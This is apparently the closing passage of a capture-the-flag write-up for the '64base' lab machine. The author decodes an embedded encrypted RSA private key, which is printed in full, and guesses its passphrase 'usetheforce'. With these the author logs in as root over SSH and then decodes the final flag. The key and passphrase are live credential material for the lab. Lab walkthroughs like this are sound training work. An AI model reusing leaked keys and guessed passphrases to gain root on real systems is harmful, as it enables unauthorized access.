51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -r -ps | base64 -d  
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED  
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6  
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz  
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0  
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse  
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH  
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob  
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL  
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw  
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd  
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv  
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG  
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx  
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi  
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV  
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt  
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE  
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI  
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG  
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj  
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3  
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P  
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t  
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----

Well it's a ssh private key. save it to a file name rsa.key.
then SSH to localhost with root:

64base@64base:/tmp$ ssh root@127.0.0.1 -p 62964 -i rsa.key  
Could not create directory '/64base/.ssh'.  
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.  
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.  
Are you sure you want to continue connecting (yes/no)? yes  
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'rsa.key' are too open.  
It is recommended that your private key files are NOT accessible by others.  
This private key will be ignored.  
key_load_private_type: bad permissions  

Well, the rsa.key is too open, I msut modify the privilege to 400

64base@64base:/tmp$ ssh root@127.0.0.1 -p 62964 -i rsa.key  
Could not create directory '/64base/.ssh'.  
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.  
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.  
Are you sure you want to continue connecting (yes/no)? yes  
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).  
Enter passphrase for key 'rsa.key':  

What? Key protection?!
Well...
check the image for more information
ok, force? or usetheforce? or theforce?
I try it and usetheforce is the real passpharse.

64base@64base:/tmp$ ssh root@127.0.0.1 -p 62964 -i rsa.key  
Could not create directory '/64base/.ssh'.  
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.  
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.  
Are you sure you want to continue connecting (yes/no)? yes  
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).  
Enter passphrase for key 'rsa.key': 

Last login: Sat Jul 15 06:12:41 2017 from 192.168.56.101

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}  
root@64base:~#  

get the last flag!!!!!!!!
decode it (many times!!)

root@64base:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -ps | base64 -d | xxd -r -ps | base64 -d  
base64 -d /var/local/.luke|less.real  

check it
Now I'm a JEDI!
Done, amazing.